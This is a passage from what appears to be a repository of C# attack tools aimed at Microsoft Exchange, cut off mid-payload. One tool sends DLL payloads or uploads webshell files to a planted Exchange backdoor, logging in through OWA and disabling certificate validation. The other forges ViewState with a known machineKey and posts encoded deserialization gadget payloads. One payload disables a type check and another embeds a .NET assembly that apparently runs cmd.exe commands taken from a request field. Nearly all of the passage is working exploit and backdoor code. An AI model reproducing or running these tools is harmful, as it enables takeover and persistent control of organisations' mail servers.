System.IO.File.ReadAllBytes(path); 82 | string base64str = Convert.ToBase64String(buffer); 83 | 84 | Console.WriteLine("[*] Try to access: " + url); 85 | request = WebRequest.Create(url) as HttpWebRequest; 86 | request.AllowAutoRedirect=false; 87 | request.Method = "POST"; 88 | request.ContentType = "application/x-www-form-urlencoded"; 89 | request.Headers.Add("Cookie",cookie); 90 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 91 | 92 | string Param2 = "demodata=" + HttpUtility.UrlEncode(base64str); 93 | byte[] post2=Encoding.UTF8.GetBytes(Param2); 94 | Stream postStream2 = request.GetRequestStream(); 95 | postStream2.Write(post2,0,post2.Length); 96 | postStream2.Close(); 97 | 98 | response = request.GetResponse() as HttpWebResponse; 99 | Stream instream = response.GetResponseStream(); 100 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 101 | string content = sr.ReadToEnd(); 102 | return content; 103 | } 104 | 105 | public static string HttpUploadFile(string url, string path) 106 | { 107 | Console.WriteLine("[*] Try to read: " + path); 108 | Console.WriteLine("[*] Try to access: " + url); 109 | 110 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 111 | HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest; 112 | request.Method = "POST"; 113 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 114 | string boundary = DateTime.Now.Ticks.ToString("X"); 115 | request.ContentType = "multipart/form-data;charset=utf-8;boundary=" + boundary; 116 | byte[] itemBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "\r\n"); 117 | byte[] endBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "--\r\n"); 118 | int pos = path.LastIndexOf("\\"); 119 | string fileName = path.Substring(pos + 1); 120 | 121 | StringBuilder sbHeader = new StringBuilder(string.Format("Content-Disposition:form-data;name=\"file\";filename=\"{0}\"\r\nContent-Type:application/octet-stream\r\n\r\n", fileName)); 122 | byte[] postHeaderBytes = Encoding.UTF8.GetBytes(sbHeader.ToString()); 123 | 124 | FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read); 125 | byte[] bArr = new byte[fs.Length]; 126 | fs.Read(bArr, 0, bArr.Length); 127 | fs.Close(); 128 | 129 | Stream postStream = request.GetRequestStream(); 130 | postStream.Write(itemBoundaryBytes, 0, itemBoundaryBytes.Length); 131 | postStream.Write(postHeaderBytes, 0, postHeaderBytes.Length); 132 | postStream.Write(bArr, 0, bArr.Length); 133 | postStream.Write(endBoundaryBytes, 0, endBoundaryBytes.Length); 134 | postStream.Close(); 135 | 136 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 137 | Stream instream = response.GetResponseStream(); 138 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 139 | string content = sr.ReadToEnd(); 140 | return content; 141 | } 142 | 143 | public static string HttpUploadFileAuth(string url, string username, string password, string path) 144 | { 145 | string[] sArray = url.Split('/'); 146 | string newurl = "https://" + sArray[2] + "/owa/auth.owa"; 147 | Console.WriteLine("[*] Try to login"); 148 | 149 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 150 | HttpWebRequest request = WebRequest.Create(newurl) as HttpWebRequest; 151 | request.AllowAutoRedirect = false; 152 | request.Method = "POST"; 153 | request.ContentType = "application/x-www-form-urlencoded"; 154 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 155 | 156 | string Param = "destination=https%3A%2F%2F" + sArray[2] + "%2Fecp%2F&flags=4&forcedownlevel=0&username="+HttpUtility.UrlEncode(username)+"&password="+HttpUtility.UrlEncode(password)+"&passwordText=&isUtf8=1"; 157 | byte[] post=Encoding.UTF8.GetBytes(Param); 158 | 159 | Stream postStream = request.GetRequestStream(); 160 | postStream.Write(post,0,post.Length); 161 | postStream.Close(); 162 | 163 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 164 | if(response.StatusCode!=(HttpStatusCode)302) 165 | { 166 | Console.WriteLine("[!] Bad login response"); 167 | System.Environment.Exit(0); 168 | } 169 | 170 | string cookie = ""; 171 | if(response.Headers.GetValues("Set-Cookie")!=null) 172 | { 173 | foreach(string s in response.Headers.GetValues("Set-Cookie")) 174 | { 175 | cookie+=s.Split(' ')[0]+" "; 176 | } 177 | } 178 | 179 | if(cookie.IndexOf("cadataKey") == -1) 180 | { 181 | Console.WriteLine("[-] Wrong password"); 182 | System.Environment.Exit(0); 183 | } 184 | Console.WriteLine("[+] Login success"); 185 | 186 | Console.WriteLine("[*] Try to read: " + path); 187 | Console.WriteLine("[*] Try to access: " + url); 188 | 189 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 190 | request = WebRequest.Create(url) as HttpWebRequest; 191 | request.Method = "POST"; 192 | request.Headers.Add("Cookie",cookie); 193 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 194 | string boundary = DateTime.Now.Ticks.ToString("X"); 195 | request.ContentType = "multipart/form-data;charset=utf-8;boundary=" + boundary; 196 | byte[] itemBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "\r\n"); 197 | byte[] endBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "--\r\n"); 198 | int pos = path.LastIndexOf("\\"); 199 | string fileName = path.Substring(pos + 1); 200 | 201 | StringBuilder sbHeader = new StringBuilder(string.Format("Content-Disposition:form-data;name=\"file\";filename=\"{0}\"\r\nContent-Type:application/octet-stream\r\n\r\n", fileName)); 202 | byte[] postHeaderBytes = Encoding.UTF8.GetBytes(sbHeader.ToString()); 203 | 204 | FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read); 205 | byte[] bArr = new byte[fs.Length]; 206 | fs.Read(bArr, 0, bArr.Length); 207 | fs.Close(); 208 | 209 | Stream postStream2 = request.GetRequestStream(); 210 | postStream2.Write(itemBoundaryBytes, 0, itemBoundaryBytes.Length); 211 | postStream2.Write(postHeaderBytes, 0, postHeaderBytes.Length); 212 | postStream2.Write(bArr, 0, bArr.Length); 213 | postStream2.Write(endBoundaryBytes, 0, endBoundaryBytes.Length); 214 | postStream2.Close(); 215 | 216 | response = request.GetResponse() as HttpWebResponse; 217 | Stream instream = response.GetResponseStream(); 218 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 219 | string content = sr.ReadToEnd(); 220 | return content; 221 | } 222 | 223 | 224 | public static void ShowUsage() 225 | { 226 | string Usage = @" 227 | Use to send payload to the Exchange webshell backdoor. 228 | Support: 229 | assemblyLoad 230 | webshellWrite 231 | 232 | Usage: 233 | 234 | mode: 235 | assemblyLoad 236 | webshellWrite 237 | eg. 238 | SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll 239 | SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx 240 | "; 241 | Console.WriteLine(Usage); 242 | } 243 | 244 | public static void Main(string[] args) 245 | { 246 | 247 | if(args.Length!=5) 248 | { 249 | ShowUsage(); 250 | System.Environment.Exit(0); 251 | } 252 | try 253 | { 254 | if(args[3] == "assemblyLoad") 255 | { 256 | Console.WriteLine("[*] Mode: assemblyLoad"); 257 | if((args[1] == "no") && (args[2] == "auth")) 258 | { 259 | Console.WriteLine("[*] Auth: Null"); 260 | string result = HttpPostData(args[0], args[4]); 261 | Console.WriteLine("[*] Response: \n" + result); 262 | } 263 | else 264 | { 265 | Console.WriteLine("[*] Auth: "+ args[1] + " " + args[2]); 266 | string result = HttpPostDataAuth(args[0], args[1], args[2], args[4]); 267 | Console.WriteLine("[*] Response: \n" + result); 268 | } 269 | } 270 | 271 | else if(args[3] == "webshellWrite") 272 | { 273 | Console.WriteLine("[*] Mode: webshellWrite"); 274 | if((args[1] == "no") && (args[2] == "auth")) 275 | { 276 | Console.WriteLine("[*] Auth: Null"); 277 | string result = HttpUploadFile(args[0], args[4]); 278 | Console.WriteLine("[*] Response: \n" + result); 279 | } 280 | else 281 | { 282 | Console.WriteLine("[*] Auth: "+ args[1] + " " + args[2]); 283 | string result = HttpUploadFileAuth(args[0], args[1], args[2], args[4]); 284 | Console.WriteLine("[*] Response: \n" + result); 285 | } 286 | } 287 | else 288 | { 289 | Console.WriteLine("[!] Wrong parameter"); 290 | } 291 | } 292 | catch (Exception e) 293 | { 294 | Console.WriteLine("{0}", e.Message); 295 | System.Environment.Exit(0); 296 | } 297 | } 298 | } 299 | } -------------------------------------------------------------------------------- /SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Net; 6 | using System.Web; 7 | using System.Globalization; 8 | using System.Security.Cryptography.X509Certificates; 9 | 10 | namespace SharpExchangeDeserializeShelltest 11 | { 12 | 13 | public class Program 14 | { 15 | 16 | 17 | static string xor(string s) 18 | { 19 | char[] a = s.ToCharArray(); 20 | for(int i = 0; i < a.Length; i++) 21 | a[i] = (char)(a[i] ^ 'x'); 22 | return new string(a); 23 | } 24 | 25 | static byte[] strToHexByte(string hexString) 26 | { 27 | if ((hexString.Length % 2) != 0) 28 | hexString += " "; 29 | byte[] returnBytes = new byte[hexString.Length / 2]; 30 | for (int i = 0; i < returnBytes.Length; i++) 31 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 32 | return returnBytes; 33 | } 34 | 35 | static string CreateViewState(byte[] dat,string generator,string key) 36 | { 37 | MemoryStream ms = new MemoryStream(); 38 | byte[] validationKey= strToHexByte(key); 39 | 40 | uint _clientstateid = 0; 41 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 42 | { 43 | System.Environment.Exit(0); 44 | } 45 | 46 | byte[] _mackey = new byte[4]; 47 | _mackey[0] = (byte)_clientstateid; 48 | _mackey[1] = (byte)(_clientstateid >> 8); 49 | _mackey[2] = (byte)(_clientstateid >> 16); 50 | _mackey[3] = (byte)(_clientstateid >> 24); 51 | 52 | ms = new MemoryStream(); 53 | ms.Write(dat,0,dat.Length); 54 | ms.Write(_mackey,0,_mackey.Length); 55 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 56 | ms=new MemoryStream(); 57 | ms.Write(dat,0,dat.Length); 58 | ms.Write(hash,0,hash.Length); 59 | return Convert.ToBase64String(ms.ToArray()); 60 | } 61 | 62 | public static void ShowUsage() 63 | { 64 | string Usage = @" 65 | Use to test the deserializing code execution of Exchange. 66 | From read and write permissions of Exchange files to deserializing code execution. 67 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 68 | :owa or ecp 69 | 70 | Usage: 71 | 72 | : owa or ecp 73 | 74 | eg. 75 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 76 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 77 | 78 | "; 79 | Console.WriteLine(Usage); 80 | } 81 | 82 | public static void Main(string[] args) 83 | { 84 | 85 | if(args.Length!=3) 86 | { 87 | ShowUsage(); 88 | System.Environment.Exit(0); 89 | } 90 | try 91 | { 92 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 93 | 94 | string targeturl = ""; 95 | string generator = ""; 96 | if(args[2] =="owa") 97 | { 98 | targeturl = "https://" + args[0] + "/owa/auth/errorFE.aspx"; 99 | generator = "042A94E8"; 100 | 101 | } 102 | else if(args[2] =="ecp") 103 | { 104 | targeturl = "https://" + args[0] + "/ecp/auth/TimeoutLogout.aspx"; 105 | generator = "277B1C2A"; 106 | } 107 | else 108 | { 109 | Console.WriteLine("[!] Wrong input"); 110 | System.Environment.Exit(0); 111 | } 112 | string key = args[1]; 113 | Console.WriteLine("[*] TargetURL: " + targeturl); 114 | Console.WriteLine(); 115 | 116 | Console.WriteLine("[*] Trying to disable ActivitySurrogateSelectorTypeCheck"); 117 | 118 | string xaml_payload1 = "/wEyrA8AAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADODTxSZXNvdXJjZURpY3Rpb25hcnkKeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIKeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiCnhtbG5zOnM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIgp4bWxuczpjPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5Db25maWd1cmF0aW9uO2Fzc2VtYmx5PVN5c3RlbS5Db25maWd1cmF0aW9uIgp4bWxuczpyPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5SZWZsZWN0aW9uO2Fzc2VtYmx5PW1zY29ybGliIj4KICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9InR5cGUiIE9iamVjdFR5cGU9Int4OlR5cGUgczpUeXBlfSIgTWV0aG9kTmFtZT0iR2V0VHlwZSI+CiAgICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgICAgICAgICA8czpTdHJpbmc+U3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLkFwcFNldHRpbmdzLCBTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9zOlN0cmluZz4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJmaWVsZCIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSB0eXBlfSIgTWV0aG9kTmFtZT0iR2V0RmllbGQiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHM6U3RyaW5nPmRpc2FibGVBY3Rpdml0eVN1cnJvZ2F0ZVNlbGVjdG9yVHlwZUNoZWNrPC9zOlN0cmluZz4KICAgICAgICAgICAgPHI6QmluZGluZ0ZsYWdzPjQwPC9yOkJpbmRpbmdGbGFncz4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXQiIE9iamVjdEluc3RhbmNlPSJ7U3RhdGljUmVzb3VyY2UgZmllbGR9IiBNZXRob2ROYW1lPSJTZXRWYWx1ZSI+CiAgICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgICAgICAgICA8czpPYmplY3QvPgogICAgICAgICAgICA8czpCb29sZWFuPnRydWU8L3M6Qm9vbGVhbj4KICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPgogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+CiAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXRNZXRob2QiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgYzpDb25maWd1cmF0aW9uTWFuYWdlci5BcHBTZXR0aW5nc30iIE1ldGhvZE5hbWUgPSJTZXQiPgogICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4KICAgICAgICAgICAgPHM6U3RyaW5nPm1pY3Jvc29mdDpXb3JrZmxvd0NvbXBvbmVudE1vZGVsOkRpc2FibGVBY3Rpdml0eVN1cnJvZ2F0ZVNlbGVjdG9yVHlwZUNoZWNrPC9zOlN0cmluZz4KICAgICAgICAgICAgPHM6U3RyaW5nPnRydWU8L3M6U3RyaW5nPgogICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+CiAgICA8L09iamVjdERhdGFQcm92aWRlcj4KPC9SZXNvdXJjZURpY3Rpb25hcnk+Cw=="; 119 | 120 | byte[] payload1 = System.Convert.FromBase64String(xaml_payload1); 121 | string data1 = CreateViewState(payload1, generator, key); 122 | 123 | HttpWebRequest hwr1 = WebRequest.Create(targeturl) as HttpWebRequest; 124 | hwr1.AllowAutoRedirect = false; 125 | hwr1.Method = "POST"; 126 | hwr1.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 127 | hwr1.ContentType = "application/x-www-form-urlencoded"; 128 | hwr1.Proxy = null; 129 | byte[] post1 = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data1)+"&__VIEWSTATEGENERATOR="+generator); 130 | hwr1.ContentLength = post1.Length; 131 | hwr1.GetRequestStream().Write(post1,0,post1.Length); 132 | HttpWebResponse res1 = hwr1.GetResponse() as HttpWebResponse; 133 | Console.WriteLine(res1.StatusCode); 134 | 135 | string xaml_payload2 = "/wEyiF0AAQAAAP////8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy0AAAIAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0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dXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlADNndjVrZHpwAFN0cmluZwBUb0NoYXJBcnJheQBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0Zvcm0AZ2V0X0l0ZW0AQ29uY2F0AHNldF9Bcmd1bWVudHMAc2V0X1JlZGlyZWN0U3RhbmRhcmRPdXRwdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRFcnJvcgBzZXRfVXNlU2hlbGxFeGVjdXRlAFN0YXJ0AFN5c3RlbS5JTwBTdHJlYW1SZWFkZXIAZ2V0X1N0YW5kYXJkT3V0cHV0AFRleHRSZWFkZXIAUmVhZFRvRW5kAFdyaXRlAEZsdXNoAEVuZABFeGNlcHRpb24AAAAAD2MAbQBkAC4AZQB4AGUAAA9fAF8AVgBhAGwAdQBlAAAHLwBjACAAAAAAAOrXDcNaTh9OoTl1+y/csJ0ACLd6XFYZNOCJBAABDg4DIAABBCABAQgEIAAdAwUgAQEdAwUHAh0DCAiwP19/EdUKOgQAABIVBCAAEhkEIAASHQQgABIlBCABAQ4EIAASKQQgABItBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSFRIhDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAFAnAAAAAAAAAAAAAG4nAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgJwAAAAAAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABMAgAAAAAAAAAAAABMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAErAEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAiAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADAALgAwAC4AMAAuADAAAAA8AA0AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAADMAZwB2ADUAawBkAHoAcAAuAGQAbABsAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAARAANAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAADMAZwB2ADUAawBkAHoAcAAuAGQAbABsAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA